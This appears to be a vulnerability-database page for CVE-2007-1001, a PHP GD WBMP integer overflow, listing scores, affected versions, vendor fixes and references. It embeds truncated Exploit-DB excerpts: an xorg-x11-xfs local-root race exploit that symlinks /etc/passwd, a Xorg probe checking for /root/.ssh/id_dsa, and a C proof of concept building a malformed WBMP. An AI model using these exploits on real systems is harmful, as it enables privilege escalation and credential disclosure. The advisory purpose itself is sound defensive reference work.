CVE-2007-1001
published 2007-04-06CVE-2007-1001: Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in wbmp.c in the GD library (libgd) in PHP 4.0.0 through 4.4.6 and 5.0.0 through…
PriorityP340medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
8.32%
94.2th percentile
Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in wbmp.c in the GD library (libgd) in PHP 4.0.0 through 4.4.6 and 5.0.0 through 5.2.1 allow context-dependent attackers to execute arbitrary code via Wireless Bitmap (WBMP) images with large width or height values.
Affected
53 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | libgd2 | < libgd2 2.0.33-1 (bookworm) | libgd2 2.0.33-1 (bookworm) |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
osv6.8MEDIUM
vendor_debian6.8MEDIUM
vendor_redhat6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-62rc-79c5-9jv7: Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in wbmp
ghsa_unreviewed·2022-05-01
CVE-2007-1001 [MEDIUM] GHSA-62rc-79c5-9jv7: Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in wbmp
Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in wbmp.c in the GD library (libgd) in PHP 4.0.0 through 4.4.6 and 5.0.0 through 5.2.1 allow context-dependent attackers to execute arbitrary code via Wireless Bitmap (WBMP) images with large width or height values.
OSV
CVE-2007-1001: Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in wbmp
osv·2007-04-06·CVSS 6.8
CVE-2007-1001 [MEDIUM] CVE-2007-1001: Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in wbmp
Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in wbmp.c in the GD library (libgd) in PHP 4.0.0 through 4.4.6 and 5.0.0 through 5.2.1 allow context-dependent attackers to execute arbitrary code via Wireless Bitmap (WBMP) images with large width or height values.
Red Hat
security flaw
vendor_redhat·2007-03-10·CVSS 6.8
CVE-2007-1001 [MEDIUM] security flaw
security flaw
Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in wbmp.c in the GD library (libgd) in PHP 4.0.0 through 4.4.6 and 5.0.0 through 5.2.1 allow context-dependent attackers to execute arbitrary code via Wireless Bitmap (WBMP) images with large width or height values.
Statement: This issue was fixed in php package updates for Red Hat Enterprise Linux and Red Hat Application Stack:
http://rhn.redhat.com/cve/CVE-2007-1001.html
This issue did not affect the versions of gd as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5.
Debian
CVE-2007-1001: libgd2 - Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in w...
vendor_debian·2007·CVSS 6.8
CVE-2007-1001 [MEDIUM] CVE-2007-1001: libgd2 - Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in w...
Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in wbmp.c in the GD library (libgd) in PHP 4.0.0 through 4.4.6 and 5.0.0 through 5.2.1 allow context-dependent attackers to execute arbitrary code via Wireless Bitmap (WBMP) images with large width or height values.
Scope: local
bookworm: resolved (fixed in 2.0.33-1)
bullseye: resolved (fixed in 2.0.33-1)
forky: resolved (fixed in 2.0.33-1)
sid: resolved (fixed in 2.0.33-1)
trixie: resolved (fixed in 2.0.33-1)
No detection rules found.
Exploit-DB
X.Org xorg-x11-xfs 1.0.2-3.1 - Local Race Condition
exploitdb·2008-02-21·CVSS 6.2
CVE-2007-3103 [MEDIUM] X.Org xorg-x11-xfs 1.0.2-3.1 - Local Race Condition
X.Org xorg-x11-xfs 1.0.2-3.1 - Local Race Condition
---
#!/bin/sh
# Xorg-x11-xfs Race Condition Vuln local root exploit (CVE-2007-3103)
#
# Another lame xploit by vl4dZ :)) works on redhat el5 and before
#
# $ id
# uid=1001(kecos) gid=1001(user) groups=1001(user)
# $ sh xfs-RaceCondition-root-exploit.sh
# [*] Generate large data file in /tmp/.font-unix
# [*] Wait for xfs service to be (re)started by root...
# [*] Hop, symlink created...
# [*] Launching root shell
# -sh-3.1# id
# uid=0(root) gid=0(root) groups=0(root)
# Vulnerable version is xorg-x11-xfs sym.c
int main(){
for(;;){if(symlink("/etc/passwd","/tmp/.font-unix")==0)
{return 0;}}}
EOF
cc sym.c -o sym>/dev/null 2>&1
if [ $? != 0 ]; then
printf "Error: Cant compile code"
exit 1
fi
printf "[*] Generate large data file in $FontDi
Exploit-DB
X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)
exploitdb·2008-02-19·CVSS 5.0
CVE-2007-5958 [MEDIUM] X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)
X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)
---
#!/bin/sh
# Xorg file disclosure vulnerability (CVE-2007-5958)
#
# Lame xploit by vl4dZ :))
#
# sh-3.1$ whoami
# uid=1001(kecos) gid=1001(user) groups=1001(user)
# sh-3.1$ ./Xorg-File-Existence-PoC.sh /root/.ssh/id_dsa
# ...
# *** FILE /root/.ssh/id_dsa EXIST !! ***
# Vulnerable: xorg-server "
exit 1
fi
[ -f ${X_EXEC} ] || (echo "${X_EXEC} not found"; exit 1)
echo -e "\n** Xorg file disclosure vulnerability PoC (CVE-2007-5958) **\n"
echo "A second X server is going to be started, once started, type the "
echo "ctrl+Alt+Backspace sequence and you'll see the result of your request."
echo -en "\nType [Enter] to start: "; read
LANG=c ${X_EXEC} :1 -ac -sp $1 2> ${TMP_FILE}
grep "error opening security policy file" ${TMP_FILE} >/de
Exploit-DB
PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow
exploitdb·2007-04-07
CVE-2007-1001 PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow
PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow
---
// source: https://www.securityfocus.com/bid/23357/info
PHP's GD extension is prone to two integer-overflow vulnerabilities because it fails to ensure that integer values aren't overrun.
Successfully exploiting these issues allows attackers to crash the affected application, potentially denying service to legitimate users. Due to the nature of the issues, code execution may also be possible, but this has not been confirmed.
PHP 5.2.1 and prior versions are vulnerable.
#define BUFSIZE 1000000
#include
int main()
{
int c;
char buf[BUFSIZE];
FILE *fp = fopen("test.wbmp","w");
//write header
c = 0;
fputc(c,fp);
fputc(c,fp);
//write width = 2^32 / 4 + 1
c = 0x84;
fputc(c,fp);
c = 0x80;
fputc(c,fp);
fputc(c,fp);
fputc(c,fp);
http://cvs.php.net/viewvc.cgi/php-src/ext/gd/libgd/wbmp.c?r1=1.2.4.1&r2=1.2.4.1.8.1http://cvs.php.net/viewvc.cgi/php-src/ext/gd/libgd/wbmp.c?revision=1.2.4.1.8.1&view=markuphttp://docs.info.apple.com/article.html?artnum=306172http://ifsec.blogspot.com/2007/04/php-521-wbmp-file-handling-integer.htmlhttp://lists.apple.com/archives/security-announce//2007/Jul/msg00004.htmlhttp://rhn.redhat.com/errata/RHSA-2007-0155.htmlhttp://secunia.com/advisories/24814http://secunia.com/advisories/24909http://secunia.com/advisories/24924http://secunia.com/advisories/24945http://secunia.com/advisories/24965http://secunia.com/advisories/25056http://secunia.com/advisories/25151http://secunia.com/advisories/25445http://secunia.com/advisories/26235http://security.gentoo.org/glsa/glsa-200705-19.xmlhttp://us2.php.net/releases/4_4_7.phphttp://us2.php.net/releases/5_2_2.phphttp://www.mandriva.com/security/advisories?name=MDKSA-2007:087http://www.mandriva.com/security/advisories?name=MDKSA-2007:088http://www.mandriva.com/security/advisories?name=MDKSA-2007:089http://www.mandriva.com/security/advisories?name=MDKSA-2007:090http://www.novell.com/linux/security/advisories/2007_32_php.htmlhttp://www.redhat.com/support/errata/RHSA-2007-0153.htmlhttp://www.redhat.com/support/errata/RHSA-2007-0162.htmlhttp://www.securityfocus.com/archive/1/464957/100/0/threadedhttp://www.securityfocus.com/archive/1/466166/100/0/threadedhttp://www.securityfocus.com/bid/23357http://www.securityfocus.com/bid/25159http://www.slackware.org/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.470053http://www.vupen.com/english/advisories/2007/1269http://www.vupen.com/english/advisories/2007/2732https://exchange.xforce.ibmcloud.com/vulnerabilities/33453https://issues.rpath.com/browse/RPL-1268https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10179http://cvs.php.net/viewvc.cgi/php-src/ext/gd/libgd/wbmp.c?r1=1.2.4.1&r2=1.2.4.1.8.1http://cvs.php.net/viewvc.cgi/php-src/ext/gd/libgd/wbmp.c?revision=1.2.4.1.8.1&view=markuphttp://docs.info.apple.com/article.html?artnum=306172http://ifsec.blogspot.com/2007/04/php-521-wbmp-file-handling-integer.htmlhttp://lists.apple.com/archives/security-announce//2007/Jul/msg00004.htmlhttp://rhn.redhat.com/errata/RHSA-2007-0155.htmlhttp://secunia.com/advisories/24814http://secunia.com/advisories/24909http://secunia.com/advisories/24924http://secunia.com/advisories/24945http://secunia.com/advisories/24965http://secunia.com/advisories/25056http://secunia.com/advisories/25151http://secunia.com/advisories/25445http://secunia.com/advisories/26235http://security.gentoo.org/glsa/glsa-200705-19.xmlhttp://us2.php.net/releases/4_4_7.phphttp://us2.php.net/releases/5_2_2.phphttp://www.mandriva.com/security/advisories?name=MDKSA-2007:087http://www.mandriva.com/security/advisories?name=MDKSA-2007:088http://www.mandriva.com/security/advisories?name=MDKSA-2007:089http://www.mandriva.com/security/advisories?name=MDKSA-2007:090http://www.novell.com/linux/security/advisories/2007_32_php.htmlhttp://www.redhat.com/support/errata/RHSA-2007-0153.htmlhttp://www.redhat.com/support/errata/RHSA-2007-0162.htmlhttp://www.securityfocus.com/archive/1/464957/100/0/threadedhttp://www.securityfocus.com/archive/1/466166/100/0/threadedhttp://www.securityfocus.com/bid/23357http://www.securityfocus.com/bid/25159http://www.slackware.org/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.470053http://www.vupen.com/english/advisories/2007/1269http://www.vupen.com/english/advisories/2007/2732https://exchange.xforce.ibmcloud.com/vulnerabilities/33453https://issues.rpath.com/browse/RPL-1268https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10179
2007-04-06
Published